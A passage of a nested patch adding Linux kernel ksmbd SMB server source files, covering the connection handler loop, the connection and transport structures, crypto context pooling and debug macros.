++	struct ksmbd_conn *bind_conn;
++
++	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
++
++	down_read(&conn_list_lock);
++	list_for_each_entry(bind_conn, &conn_list, conns_list) {
++		if (bind_conn == conn)
++			continue;
++
++		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
++		    !ksmbd_conn_releasing(bind_conn) &&
++		    atomic_read(&bind_conn->req_running)) {
++			wait_event(bind_conn->req_running_q,
++				atomic_read(&bind_conn->req_running) == 0);
++		}
++	}
++	up_read(&conn_list_lock);
++}
++
++int ksmbd_conn_write(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	size_t len = 0;
++	int sent;
++	struct kvec iov[3];
++	int iov_idx = 0;
++
++	if (!work->response_buf) {
++		pr_err("NULL response header\n");
++		return -EINVAL;
++	}
++
++	if (work->tr_buf) {
++		iov[iov_idx] = (struct kvec) { work->tr_buf,
++				sizeof(struct smb2_transform_hdr) + 4 };
++		len += iov[iov_idx++].iov_len;
++	}
++
++	if (work->aux_payload_sz) {
++		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
++		len += iov[iov_idx++].iov_len;
++		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
++		len += iov[iov_idx++].iov_len;
++	} else {
++		if (work->tr_buf)
++			iov[iov_idx].iov_len = work->resp_hdr_sz;
++		else
++			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
++		iov[iov_idx].iov_base = work->response_buf;
++		len += iov[iov_idx++].iov_len;
++	}
++
++	ksmbd_conn_lock(conn);
++	sent = conn->transport->ops->writev(conn->transport, &iov[0],
++					iov_idx, len,
++					work->need_invalidate_rkey,
++					work->remote_key);
++	ksmbd_conn_unlock(conn);
++
++	if (sent < 0) {
++		pr_err("Failed to send message: %d\n", sent);
++		return sent;
++	}
++
++	return 0;
++}
++
++int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
++			 void *buf, unsigned int buflen,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len)
++{
++	int ret = -EINVAL;
++
++	if (conn->transport->ops->rdma_read)
++		ret = conn->transport->ops->rdma_read(conn->transport,
++						      buf, buflen,
++						      desc, desc_len);
++	return ret;
++}
++
++int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
++			  void *buf, unsigned int buflen,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len)
++{
++	int ret = -EINVAL;
++
++	if (conn->transport->ops->rdma_write)
++		ret = conn->transport->ops->rdma_write(conn->transport,
++						       buf, buflen,
++						       desc, desc_len);
++	return ret;
++}
++
++bool ksmbd_conn_alive(struct ksmbd_conn *conn)
++{
++	if (!ksmbd_server_running())
++		return false;
++
++	if (ksmbd_conn_exiting(conn))
++		return false;
++
++	if (kthread_should_stop())
++		return false;
++
++	if (atomic_read(&conn->stats.open_files_count) > 0)
++		return true;
++
++	/*
++	 * Stop current session if the time that get last request from client
++	 * is bigger than deadtime user configured and opening file count is
++	 * zero.
++	 */
++	if (server_conf.deadtime > 0 &&
++	    time_after(jiffies, conn->last_active + server_conf.deadtime)) {
++		ksmbd_debug(CONN, "No response from client in %lu minutes\n",
++			    server_conf.deadtime / SMB_ECHO_INTERVAL);
++		return false;
++	}
++	return true;
++}
++
++#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
++#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
++
++/**
++ * ksmbd_conn_handler_loop() - session thread to listen on new smb requests
++ * @p:		connection instance
++ *
++ * One thread each per connection
++ *
++ * Return:	0 on success
++ */
++int ksmbd_conn_handler_loop(void *p)
++{
++	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
++	struct ksmbd_transport *t = conn->transport;
++	unsigned int pdu_size, max_allowed_pdu_size;
++	char hdr_buf[4] = {0,};
++	int size;
++
++	mutex_init(&conn->srv_mutex);
++	__module_get(THIS_MODULE);
++
++	if (t->ops->prepare && t->ops->prepare(t))
++		goto out;
++
++	conn->last_active = jiffies;
++	while (ksmbd_conn_alive(conn)) {
++		if (try_to_freeze())
++			continue;
++
++		kvfree(conn->request_buf);
++		conn->request_buf = NULL;
++
++		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
++		if (size != sizeof(hdr_buf))
++			break;
++
++		pdu_size = get_rfc1002_len(hdr_buf);
++		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
++
++		if (ksmbd_conn_good(conn))
++			max_allowed_pdu_size =
++				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
++		else
++			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
++
++		if (pdu_size > max_allowed_pdu_size) {
++			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
++					pdu_size, max_allowed_pdu_size,
++					READ_ONCE(conn->status));
++			break;
++		}
++
++		/*
++		 * Check maximum pdu size(0x00FFFFFF).
++		 */
++		if (pdu_size > MAX_STREAM_PROT_LEN)
++			break;
++
++		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
++			break;
++
++		/* 4 for rfc1002 length field */
++		/* 1 for implied bcc[0] */
++		size = pdu_size + 4 + 1;
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
++		if (!conn->request_buf)
++			break;
++
++		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
++
++		/*
++		 * We already read 4 bytes to find out PDU size, now
++		 * read in PDU
++		 */
++		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
++		if (size < 0) {
++			pr_err("sock_read failed: %d\n", size);
++			break;
++		}
++
++		if (size != pdu_size) {
++			pr_err("PDU error. Read: %d, Expected: %d\n",
++			       size, pdu_size);
++			continue;
++		}
++
++		if (!ksmbd_smb_request(conn))
++			break;
++
++		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
++		    SMB2_PROTO_NUMBER) {
++			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
++				break;
++		}
++
++		if (!default_conn_ops.process_fn) {
++			pr_err("No connection request callback\n");
++			break;
++		}
++
++		if (default_conn_ops.process_fn(conn)) {
++			pr_err("Cannot handle request\n");
++			break;
++		}
++	}
++
++out:
++	ksmbd_conn_set_releasing(conn);
++	/* Wait till all reference dropped to the Server object*/
++	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
++
++	if (IS_ENABLED(CONFIG_UNICODE))
++		utf8_unload(conn->um);
++	unload_nls(conn->local_nls);
++	if (default_conn_ops.terminate_fn)
++		default_conn_ops.terminate_fn(conn);
++	t->ops->disconnect(t);
++	module_put(THIS_MODULE);
++	return 0;
++}
++
++void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops)
++{
++	default_conn_ops.process_fn = ops->process_fn;
++	default_conn_ops.terminate_fn = ops->terminate_fn;
++}
++
++int ksmbd_conn_transport_init(void)
++{
++	int ret;
++
++	mutex_lock(&init_lock);
++	ret = ksmbd_tcp_init();
++	if (ret) {
++		pr_err("Failed to init TCP subsystem: %d\n", ret);
++		goto out;
++	}
++
++	ret = ksmbd_rdma_init();
++	if (ret) {
++		pr_err("Failed to init RDMA subsystem: %d\n", ret);
++		goto out;
++	}
++out:
++	mutex_unlock(&init_lock);
++	return ret;
++}
++
++static void stop_sessions(void)
++{
++	struct ksmbd_conn *conn;
++	struct ksmbd_transport *t;
++
++again:
++	down_read(&conn_list_lock);
++	list_for_each_entry(conn, &conn_list, conns_list) {
++		struct task_struct *task;
++
++		t = conn->transport;
++		task = t->handler;
++		if (task)
++			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
++				    task->comm, task_pid_nr(task));
++		ksmbd_conn_set_exiting(conn);
++		if (t->ops->shutdown) {
++			up_read(&conn_list_lock);
++			t->ops->shutdown(t);
++			down_read(&conn_list_lock);
++		}
++	}
++	up_read(&conn_list_lock);
++
++	if (!list_empty(&conn_list)) {
++		schedule_timeout_interruptible(HZ / 10); /* 100ms */
++		goto again;
++	}
++}
++
++void ksmbd_conn_transport_destroy(void)
++{
++	mutex_lock(&init_lock);
++	ksmbd_tcp_destroy();
++	ksmbd_rdma_destroy();
++	stop_sessions();
++	mutex_unlock(&init_lock);
++}
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+new file mode 100644
+index 0000000000000..ad8dfaa48ffb3
+--- /dev/null
++++ b/fs/smb/server/connection.h
+@@ -0,0 +1,231 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_CONNECTION_H__
++#define __KSMBD_CONNECTION_H__
++
++#include <linux/list.h>
++#include <linux/ip.h>
++#include <net/sock.h>
++#include <net/tcp.h>
++#include <net/inet_connection_sock.h>
++#include <net/request_sock.h>
++#include <linux/kthread.h>
++#include <linux/nls.h>
++#include <linux/unicode.h>
++
++#include "smb_common.h"
++#include "ksmbd_work.h"
++
++#define KSMBD_SOCKET_BACKLOG		16
++
++enum {
++	KSMBD_SESS_NEW = 0,
++	KSMBD_SESS_GOOD,
++	KSMBD_SESS_EXITING,
++	KSMBD_SESS_NEED_RECONNECT,
++	KSMBD_SESS_NEED_NEGOTIATE,
++	KSMBD_SESS_RELEASING
++};
++
++struct ksmbd_stats {
++	atomic_t			open_files_count;
++	atomic64_t			request_served;
++};
++
++struct ksmbd_transport;
++
++struct ksmbd_conn {
++	struct smb_version_values	*vals;
++	struct smb_version_ops		*ops;
++	struct smb_version_cmds		*cmds;
++	unsigned int			max_cmds;
++	struct mutex			srv_mutex;
++	int				status;
++	unsigned int			cli_cap;
++	char				*request_buf;
++	struct ksmbd_transport		*transport;
++	struct nls_table		*local_nls;
++	struct unicode_map		*um;
++	struct list_head		conns_list;
++	/* smb session 1 per user */
++	struct xarray			sessions;
++	unsigned long			last_active;
++	/* How many request are running currently */
++	atomic_t			req_running;
++	/* References which are made for this Server object*/
++	atomic_t			r_count;
++	unsigned int			total_credits;
++	unsigned int			outstanding_credits;
++	spinlock_t			credits_lock;
++	wait_queue_head_t		req_running_q;
++	wait_queue_head_t		r_count_q;
++	/* Lock to protect requests list*/
++	spinlock_t			request_lock;
++	struct list_head		requests;
++	struct list_head		async_requests;
++	int				connection_type;
++	struct ksmbd_stats		stats;
++	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
++	struct ntlmssp_auth		ntlmssp;
++
++	spinlock_t			llist_lock;
++	struct list_head		lock_list;
++
++	struct preauth_integrity_info	*preauth_info;
++
++	bool				need_neg;
++	unsigned int			auth_mechs;
++	unsigned int			preferred_auth_mech;
++	bool				sign;
++	bool				use_spnego:1;
++	__u16				cli_sec_mode;
++	__u16				srv_sec_mode;
++	/* dialect index that server chose */
++	__u16				dialect;
++
++	char				*mechToken;
++
++	struct ksmbd_conn_ops	*conn_ops;
++
++	/* Preauth Session Table */
++	struct list_head		preauth_sess_table;
++
++	struct sockaddr_storage		peer_addr;
++
++	/* Identifier for async message */
++	struct ida			async_ida;
++
++	__le16				cipher_type;
++	__le16				compress_algorithm;
++	bool				posix_ext_supported;
++	bool				signing_negotiated;
++	__le16				signing_algorithm;
++	bool				binding;
++};
++
++struct ksmbd_conn_ops {
++	int	(*process_fn)(struct ksmbd_conn *conn);
++	int	(*terminate_fn)(struct ksmbd_conn *conn);
++};
++
++struct ksmbd_transport_ops {
++	int (*prepare)(struct ksmbd_transport *t);
++	void (*disconnect)(struct ksmbd_transport *t);
++	void (*shutdown)(struct ksmbd_transport *t);
++	int (*read)(struct ksmbd_transport *t, char *buf,
++		    unsigned int size, int max_retries);
++	int (*writev)(struct ksmbd_transport *t, struct kvec *iovs, int niov,
++		      int size, bool need_invalidate_rkey,
++		      unsigned int remote_key);
++	int (*rdma_read)(struct ksmbd_transport *t,
++			 void *buf, unsigned int len,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len);
++	int (*rdma_write)(struct ksmbd_transport *t,
++			  void *buf, unsigned int len,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len);
++};
++
++struct ksmbd_transport {
++	struct ksmbd_conn		*conn;
++	struct ksmbd_transport_ops	*ops;
++	struct task_struct		*handler;
++};
++
++#define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
++#define KSMBD_TCP_SEND_TIMEOUT	(5 * HZ)
++#define KSMBD_TCP_PEER_SOCKADDR(c)	((struct sockaddr *)&((c)->peer_addr))
++
++extern struct list_head conn_list;
++extern struct rw_semaphore conn_list_lock;
++
++bool ksmbd_conn_alive(struct ksmbd_conn *conn);
++void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id);
++struct ksmbd_conn *ksmbd_conn_alloc(void);
++void ksmbd_conn_free(struct ksmbd_conn *conn);
++bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c);
++int ksmbd_conn_write(struct ksmbd_work *work);
++int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
++			 void *buf, unsigned int buflen,
++			 struct smb2_buffer_desc_v1 *desc,
++			 unsigned int desc_len);
++int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
++			  void *buf, unsigned int buflen,
++			  struct smb2_buffer_desc_v1 *desc,
++			  unsigned int desc_len);
++void ksmbd_conn_enqueue_request(struct ksmbd_work *work);
++int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work);
++void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops);
++int ksmbd_conn_handler_loop(void *p);
++int ksmbd_conn_transport_init(void);
++void ksmbd_conn_transport_destroy(void);
++void ksmbd_conn_lock(struct ksmbd_conn *conn);
++void ksmbd_conn_unlock(struct ksmbd_conn *conn);
++
++/*
++ * WARNING
++ *
++ * This is a hack. We will move status to a proper place once we land
++ * a multi-sessions support.
++ */
++static inline bool ksmbd_conn_good(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_GOOD;
++}
++
++static inline bool ksmbd_conn_need_negotiate(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_NEGOTIATE;
++}
++
++static inline bool ksmbd_conn_need_reconnect(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_NEED_RECONNECT;
++}
++
++static inline bool ksmbd_conn_exiting(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_EXITING;
++}
++
++static inline bool ksmbd_conn_releasing(struct ksmbd_conn *conn)
++{
++	return READ_ONCE(conn->status) == KSMBD_SESS_RELEASING;
++}
++
++static inline void ksmbd_conn_set_new(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEW);
++}
++
++static inline void ksmbd_conn_set_good(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_GOOD);
++}
++
++static inline void ksmbd_conn_set_need_negotiate(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_NEGOTIATE);
++}
++
++static inline void ksmbd_conn_set_need_reconnect(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_NEED_RECONNECT);
++}
++
++static inline void ksmbd_conn_set_exiting(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_EXITING);
++}
++
++static inline void ksmbd_conn_set_releasing(struct ksmbd_conn *conn)
++{
++	WRITE_ONCE(conn->status, KSMBD_SESS_RELEASING);
++}
++
++void ksmbd_all_conn_set_status(u64 sess_id, u32 status);
++#endif /* __CONNECTION_H__ */
+diff --git a/fs/smb/server/crypto_ctx.c b/fs/smb/server/crypto_ctx.c
+new file mode 100644
+index 0000000000000..81488d04199da
+--- /dev/null
++++ b/fs/smb/server/crypto_ctx.c
+@@ -0,0 +1,266 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/kernel.h>
++#include <linux/string.h>
++#include <linux/err.h>
++#include <linux/slab.h>
++#include <linux/wait.h>
++#include <linux/sched.h>
++
++#include "glob.h"
++#include "crypto_ctx.h"
++
++struct crypto_ctx_list {
++	spinlock_t		ctx_lock;
++	int			avail_ctx;
++	struct list_head	idle_ctx;
++	wait_queue_head_t	ctx_wait;
++};
++
++static struct crypto_ctx_list ctx_list;
++
++static inline void free_aead(struct crypto_aead *aead)
++{
++	if (aead)
++		crypto_free_aead(aead);
++}
++
++static void free_shash(struct shash_desc *shash)
++{
++	if (shash) {
++		crypto_free_shash(shash->tfm);
++		kfree(shash);
++	}
++}
++
++static struct crypto_aead *alloc_aead(int id)
++{
++	struct crypto_aead *tfm = NULL;
++
++	switch (id) {
++	case CRYPTO_AEAD_AES_GCM:
++		tfm = crypto_alloc_aead("gcm(aes)", 0, 0);
++		break;
++	case CRYPTO_AEAD_AES_CCM:
++		tfm = crypto_alloc_aead("ccm(aes)", 0, 0);
++		break;
++	default:
++		pr_err("Does not support encrypt ahead(id : %d)\n", id);
++		return NULL;
++	}
++
++	if (IS_ERR(tfm)) {
++		pr_err("Failed to alloc encrypt aead : %ld\n", PTR_ERR(tfm));
++		return NULL;
++	}
++
++	return tfm;
++}
++
++static struct shash_desc *alloc_shash_desc(int id)
++{
++	struct crypto_shash *tfm = NULL;
++	struct shash_desc *shash;
++
++	switch (id) {
++	case CRYPTO_SHASH_HMACMD5:
++		tfm = crypto_alloc_shash("hmac(md5)", 0, 0);
++		break;
++	case CRYPTO_SHASH_HMACSHA256:
++		tfm = crypto_alloc_shash("hmac(sha256)", 0, 0);
++		break;
++	case CRYPTO_SHASH_CMACAES:
++		tfm = crypto_alloc_shash("cmac(aes)", 0, 0);
++		break;
++	case CRYPTO_SHASH_SHA256:
++		tfm = crypto_alloc_shash("sha256", 0, 0);
++		break;
++	case CRYPTO_SHASH_SHA512:
++		tfm = crypto_alloc_shash("sha512", 0, 0);
++		break;
++	default:
++		return NULL;
++	}
++
++	if (IS_ERR(tfm))
++		return NULL;
++
++	shash = kzalloc(sizeof(*shash) + crypto_shash_descsize(tfm),
++			GFP_KERNEL);
++	if (!shash)
++		crypto_free_shash(tfm);
++	else
++		shash->tfm = tfm;
++	return shash;
++}
++
++static void ctx_free(struct ksmbd_crypto_ctx *ctx)
++{
++	int i;
++
++	for (i = 0; i < CRYPTO_SHASH_MAX; i++)
++		free_shash(ctx->desc[i]);
++	for (i = 0; i < CRYPTO_AEAD_MAX; i++)
++		free_aead(ctx->ccmaes[i]);
++	kfree(ctx);
++}
++
++static struct ksmbd_crypto_ctx *ksmbd_find_crypto_ctx(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	while (1) {
++		spin_lock(&ctx_list.ctx_lock);
++		if (!list_empty(&ctx_list.idle_ctx)) {
++			ctx = list_entry(ctx_list.idle_ctx.next,
++					 struct ksmbd_crypto_ctx,
++					 list);
++			list_del(&ctx->list);
++			spin_unlock(&ctx_list.ctx_lock);
++			return ctx;
++		}
++
++		if (ctx_list.avail_ctx > num_online_cpus()) {
++			spin_unlock(&ctx_list.ctx_lock);
++			wait_event(ctx_list.ctx_wait,
++				   !list_empty(&ctx_list.idle_ctx));
++			continue;
++		}
++
++		ctx_list.avail_ctx++;
++		spin_unlock(&ctx_list.ctx_lock);
++
++		ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
++		if (!ctx) {
++			spin_lock(&ctx_list.ctx_lock);
++			ctx_list.avail_ctx--;
++			spin_unlock(&ctx_list.ctx_lock);
++			wait_event(ctx_list.ctx_wait,
++				   !list_empty(&ctx_list.idle_ctx));
++			continue;
++		}
++		break;
++	}
++	return ctx;
++}
++
++void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx)
++{
++	if (!ctx)
++		return;
++
++	spin_lock(&ctx_list.ctx_lock);
++	if (ctx_list.avail_ctx <= num_online_cpus()) {
++		list_add(&ctx->list, &ctx_list.idle_ctx);
++		spin_unlock(&ctx_list.ctx_lock);
++		wake_up(&ctx_list.ctx_wait);
++		return;
++	}
++
++	ctx_list.avail_ctx--;
++	spin_unlock(&ctx_list.ctx_lock);
++	ctx_free(ctx);
++}
++
++static struct ksmbd_crypto_ctx *____crypto_shash_ctx_find(int id)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	if (id >= CRYPTO_SHASH_MAX)
++		return NULL;
++
++	ctx = ksmbd_find_crypto_ctx();
++	if (ctx->desc[id])
++		return ctx;
++
++	ctx->desc[id] = alloc_shash_desc(id);
++	if (ctx->desc[id])
++		return ctx;
++	ksmbd_release_crypto_ctx(ctx);
++	return NULL;
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACMD5);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_HMACSHA256);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_CMACAES);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA256);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void)
++{
++	return ____crypto_shash_ctx_find(CRYPTO_SHASH_SHA512);
++}
++
++static struct ksmbd_crypto_ctx *____crypto_aead_ctx_find(int id)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	if (id >= CRYPTO_AEAD_MAX)
++		return NULL;
++
++	ctx = ksmbd_find_crypto_ctx();
++	if (ctx->ccmaes[id])
++		return ctx;
++
++	ctx->ccmaes[id] = alloc_aead(id);
++	if (ctx->ccmaes[id])
++		return ctx;
++	ksmbd_release_crypto_ctx(ctx);
++	return NULL;
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void)
++{
++	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_GCM);
++}
++
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void)
++{
++	return ____crypto_aead_ctx_find(CRYPTO_AEAD_AES_CCM);
++}
++
++void ksmbd_crypto_destroy(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	while (!list_empty(&ctx_list.idle_ctx)) {
++		ctx = list_entry(ctx_list.idle_ctx.next,
++				 struct ksmbd_crypto_ctx,
++				 list);
++		list_del(&ctx->list);
++		ctx_free(ctx);
++	}
++}
++
++int ksmbd_crypto_create(void)
++{
++	struct ksmbd_crypto_ctx *ctx;
++
++	spin_lock_init(&ctx_list.ctx_lock);
++	INIT_LIST_HEAD(&ctx_list.idle_ctx);
++	init_waitqueue_head(&ctx_list.ctx_wait);
++	ctx_list.avail_ctx = 1;
++
++	ctx = kzalloc(sizeof(struct ksmbd_crypto_ctx), GFP_KERNEL);
++	if (!ctx)
++		return -ENOMEM;
++	list_add(&ctx->list, &ctx_list.idle_ctx);
++	return 0;
++}
+diff --git a/fs/smb/server/crypto_ctx.h b/fs/smb/server/crypto_ctx.h
+new file mode 100644
+index 0000000000000..4a367c62f6536
+--- /dev/null
++++ b/fs/smb/server/crypto_ctx.h
+@@ -0,0 +1,66 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __CRYPTO_CTX_H__
++#define __CRYPTO_CTX_H__
++
++#include <crypto/hash.h>
++#include <crypto/aead.h>
++
++enum {
++	CRYPTO_SHASH_HMACMD5	= 0,
++	CRYPTO_SHASH_HMACSHA256,
++	CRYPTO_SHASH_CMACAES,
++	CRYPTO_SHASH_SHA256,
++	CRYPTO_SHASH_SHA512,
++	CRYPTO_SHASH_MAX,
++};
++
++enum {
++	CRYPTO_AEAD_AES_GCM = 16,
++	CRYPTO_AEAD_AES_CCM,
++	CRYPTO_AEAD_MAX,
++};
++
++enum {
++	CRYPTO_BLK_ECBDES	= 32,
++	CRYPTO_BLK_MAX,
++};
++
++struct ksmbd_crypto_ctx {
++	struct list_head		list;
++
++	struct shash_desc		*desc[CRYPTO_SHASH_MAX];
++	struct crypto_aead		*ccmaes[CRYPTO_AEAD_MAX];
++};
++
++#define CRYPTO_HMACMD5(c)	((c)->desc[CRYPTO_SHASH_HMACMD5])
++#define CRYPTO_HMACSHA256(c)	((c)->desc[CRYPTO_SHASH_HMACSHA256])
++#define CRYPTO_CMACAES(c)	((c)->desc[CRYPTO_SHASH_CMACAES])
++#define CRYPTO_SHA256(c)	((c)->desc[CRYPTO_SHASH_SHA256])
++#define CRYPTO_SHA512(c)	((c)->desc[CRYPTO_SHASH_SHA512])
++
++#define CRYPTO_HMACMD5_TFM(c)	((c)->desc[CRYPTO_SHASH_HMACMD5]->tfm)
++#define CRYPTO_HMACSHA256_TFM(c)\
++				((c)->desc[CRYPTO_SHASH_HMACSHA256]->tfm)
++#define CRYPTO_CMACAES_TFM(c)	((c)->desc[CRYPTO_SHASH_CMACAES]->tfm)
++#define CRYPTO_SHA256_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA256]->tfm)
++#define CRYPTO_SHA512_TFM(c)	((c)->desc[CRYPTO_SHASH_SHA512]->tfm)
++
++#define CRYPTO_GCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_GCM])
++#define CRYPTO_CCM(c)		((c)->ccmaes[CRYPTO_AEAD_AES_CCM])
++
++void ksmbd_release_crypto_ctx(struct ksmbd_crypto_ctx *ctx);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacmd5(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_hmacsha256(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_cmacaes(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha512(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_sha256(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_gcm(void);
++struct ksmbd_crypto_ctx *ksmbd_crypto_ctx_find_ccm(void);
++void ksmbd_crypto_destroy(void);
++int ksmbd_crypto_create(void);
++
++#endif /* __CRYPTO_CTX_H__ */
+diff --git a/fs/smb/server/glob.h b/fs/smb/server/glob.h
+new file mode 100644
+index 0000000000000..5b8f3e0ebdb36
+--- /dev/null
++++ b/fs/smb/server/glob.h
+@@ -0,0 +1,49 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_GLOB_H
++#define __KSMBD_GLOB_H
++
++#include <linux/ctype.h>
++
++#include "unicode.h"
++#include "vfs_cache.h"
++
++#define KSMBD_VERSION	"3.4.2"
++
++extern int ksmbd_debug_types;
++
++#define KSMBD_DEBUG_SMB		BIT(0)
++#define KSMBD_DEBUG_AUTH	BIT(1)
++#define KSMBD_DEBUG_VFS		BIT(2)
++#define KSMBD_DEBUG_OPLOCK      BIT(3)
++#define KSMBD_DEBUG_IPC         BIT(4)
++#define KSMBD_DEBUG_CONN        BIT(5)
++#define KSMBD_DEBUG_RDMA        BIT(6)
++#define KSMBD_DEBUG_ALL         (KSMBD_DEBUG_SMB | KSMBD_DEBUG_AUTH |	\
++				KSMBD_DEBUG_VFS | KSMBD_DEBUG_OPLOCK |	\
++				KSMBD_DEBUG_IPC | KSMBD_DEBUG_CONN |	\
++				KSMBD_DEBUG_RDMA)
++
++#ifdef pr_fmt
++#undef pr_fmt
++#endif
++
++#ifdef SUBMOD_NAME
++#define pr_fmt(fmt)	"ksmbd: " SUBMOD_NAME ": " fmt
++#else
++#define pr_fmt(fmt)	"ksmbd: " fmt
++#endif
++
++#define ksmbd_debug(type, fmt, ...)				\
++	do {							\
++		if (ksmbd_debug_types & KSMBD_DEBUG_##type)	\
++			pr_info(fmt, ##__VA_ARGS__);		\
++	} while (0)
++
++#define UNICODE_LEN(x)		((x) * 2)
++
++#endif /* __KSMBD_GLOB_H */
+diff --git a/fs/smb/server/ksmbd_netlink.h b/fs/smb/server/ksmbd_netlink.h
+new file mode 100644
+index 0000000000000..ce866ff159bfe
+--- /dev/null
++++ b/fs/smb/server/ksmbd_netlink.h
+@@ -0,0 +1,412 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ *
++ *   linux-ksmbd-devel@lists.sourceforge.net
++ */
++
++#ifndef _LINUX_KSMBD_SERVER_H
++#define _LINUX_KSMBD_SERVER_H
++
++#include <linux/types.h>
++
++/*
++ * This is a userspace ABI to communicate data between ksmbd and user IPC
++ * daemon using netlink. This is added to track and cache user account DB
++ * and share configuration info from userspace.
++ *
++ *  - KSMBD_EVENT_HEARTBEAT_REQUEST(ksmbd_heartbeat)
++ *    This event is to check whether user IPC daemon is alive. If user IPC
++ *    daemon is dead, ksmbd keep existing connection till disconnecting and
++ *    new connection will be denied.
++ *
++ *  - KSMBD_EVENT_STARTING_UP(ksmbd_startup_request)
++ *    This event is to receive the information that initializes the ksmbd
++ *    server from the user IPC daemon and to start the server. The global
++ *    section parameters are given from smb.conf as initialization
++ *    information.
++ *
++ *  - KSMBD_EVENT_SHUTTING_DOWN(ksmbd_shutdown_request)
